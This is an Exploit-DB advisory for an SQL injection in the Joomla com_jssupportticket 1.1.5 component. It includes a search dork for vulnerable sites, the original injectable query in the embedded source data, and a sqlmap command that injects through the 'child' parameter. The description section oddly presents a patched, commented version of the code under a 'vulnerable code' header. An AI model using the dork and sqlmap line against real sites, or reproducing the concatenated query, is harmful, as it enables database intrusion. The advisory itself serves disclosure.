ID EDB-ID:47218
Type exploitdb
Reporter Exploit-DB
Modified 2019-08-08T00:00:00
Description
#Exploit Title: Joomla! component com_jssupportticket - SQL Injection
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 08.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.5
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
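The vulnerable code is on line 441 of admin/models/userfields.php: $childfield is concatenated into the SQL string without quoting or escaping, so whoever supplies that value controls part of the query text. The remedy is to pass the value through the database driver's quoting (or a prepared statement) before it reaches the query.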
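/**
 * Build the HTML select list of options for a dependent user field.
 *
 * Loads the row of `#__js_ticket_fieldsordering` whose `field` column equals
 * $childfield, decodes its JSON `userfieldparams`, and turns the entries stored
 * under the key equal to $val into options for JHTML select.genericList.
 *
 * Security fix: line 441 of the original file built the WHERE clause as
 *     "... WHERE field = '" . $childfield . "'"
 * which placed the caller-supplied value directly into the SQL text. The value
 * now goes through $db->quote(), which escapes it and adds the surrounding
 * quotes, so it can only ever be read as a string literal.
 *
 * @param mixed  $val        Key to look up inside the decoded userfieldparams.
 * @param string $childfield Name of the dependent field; must be treated as untrusted.
 *
 * @return string HTML returned by JHTML select.genericList (an empty list when
 *                no matching row or no matching key exists).
 */
function dataForDepandantField( $val , $childfield){
    $db = $this->getDBO();

    // Never concatenate $childfield into the statement: quote() escapes the
    // value for the active driver and wraps it in quotes.
    $query = "SELECT userfieldparams,fieldtitle,field,depandant_field FROM `#__js_ticket_fieldsordering` WHERE field = " . $db->quote($childfield);
    $db->setQuery($query);
    $data = $db->loadObject();

    $comboOptions = array();
    $jsFunction = '';

    // A value that matches no row yields no object; skip the property reads
    // instead of dereferencing a non-object.
    if (is_object($data)) {
        $decoded_data = json_decode($data->userfieldparams);

        // json_decode() returns null for missing or malformed JSON.
        if (is_object($decoded_data) || is_array($decoded_data)) {
            $flag = 0;
            foreach ($decoded_data as $key => $value) {
                if ($key == $val) {
                    $total = count($value);
                    for ($i = 0; $i < $total; $i++) {
                        // The "Select <title>" placeholder is emitted once, ahead of the first option.
                        if ($flag == 0) {
                            $comboOptions[] = array('value' => '', 'text' => JText::_('Select').' '.$data->fieldtitle);
                        }
                        $comboOptions[] = array('value' => $value[$i], 'text' => $value[$i]);
                        $flag = 1;
                    }
                }
            }
        }

        if ($data->depandant_field != null) {
            // NOTE(review): both field names are written into an inline handler
            // unescaped; confirm they are restricted to safe identifiers when stored.
            $jsFunction = "onchange=getDataForDepandantField('" . $data->field . "','" . $data->depandant_field . "',1);";
        }
    }

    // NOTE(review): $childfield is also used as the element name in the returned
    // markup; confirm it is validated or HTML-escaped before it is output.
    $html = JHTML::_('select.genericList', $comboOptions , $childfield,'class="inputbox one"'.$jsFunction, 'value' , 'text' ,'');
    return $html;
}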
#####################################
#PoC:
#####################################
$> sqlmap.py -u "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=datafordepandantfield&fvalue=0&child=0" --random-agent -p child --dbms=mysql
{"id": "EDB-ID:47218", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection", "description": "", "published": "2019-08-08T00:00:00", "modified": "2019-08-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/47218", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2019-08-08T14:09:37", "viewCount": 68, "enchantments": {"dependencies": {"references": [], "modified": "2019-08-08T14:09:37", "rev": 2}, "score": {"value": 0.1, "vector": "NONE", "modified": "2019-08-08T14:09:37", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://www.exploit-db.com/download/47218", "sourceData": "#Exploit Title: Joomla! component com_jssupportticket - SQL Injection\r\n#Dork: inurl:\"index.php?option=com_jssupportticket\"\r\n#Date: 08.08.19\r\n#Exploit Author: qw3rTyTy\r\n#Vendor Homepage: https://www.joomsky.com/\r\n#Software Link: https://www.joomsky.com/46/download/1.html\r\n#Version: 1.1.5\r\n#Tested on: Debian/nginx/joomla 3.9.0\r\n#####################################\r\n#Vulnerability details:\r\n#####################################\r\nVulnerable code is in line 441 in file admin/models/userfields.php\r\n\r\n 439\t function dataForDepandantField( $val , $childfield){ \r\n 440\t $db = $this->getDBO();\r\n 441\t $query = \"SELECT userfieldparams,fieldtitle,field,depandant_field FROM `#__js_ticket_fieldsordering` WHERE field = '\".$childfield.\"'\"; //!!!\r\n 442\t $db->setQuery($query);\r\n 443\t $data = $db->loadObject();\r\n 444\t $decoded_data = json_decode($data->userfieldparams); \r\n 445\t $comboOptions = array(); \r\n 446\t $flag = 0; \r\n 447\t foreach ($decoded_data as $key => $value) { \r\n 448\t if($key == $val){ \r\n 449\t for ($i=0; $i < count($value) ; $i++) { \r\n 450\t if($flag == 0){\r\n 451\t $comboOptions[] = array('value' => '', 'text' => JText::_('Select').' 
'.$data->fieldtitle); \r\n 452\t }\r\n 453\t $comboOptions[] = array('value' => $value[$i], 'text' => $value[$i]); \r\n 454\t $flag = 1; \r\n 455\t } \r\n 456\t } \r\n 457\t }\r\n 458\t $jsFunction = ''; \r\n 459\t if ($data->depandant_field != null) {\r\n 460\t $jsFunction = \"onchange=getDataForDepandantField('\" . $data->field . \"','\" . $data->depandant_field . \"',1);\";\r\n 461\t }\r\n 462\t $html = JHTML::_('select.genericList', $comboOptions , $childfield,'class=\"inputbox one\"'.$jsFunction, 'value' , 'text' ,'');\r\n 463\t return $html; \r\n 464\t }\r\n\r\n#####################################\r\n#PoC:\r\n#####################################\r\n$> sqlmap.py -u \"http://localhost/index.php?option=com_jssupportticket&c=ticket&task=datafordepandantfield&fvalue=0&child=0\" --random-agent -p child --dbms=mysql", "osvdbidlist": []}
{}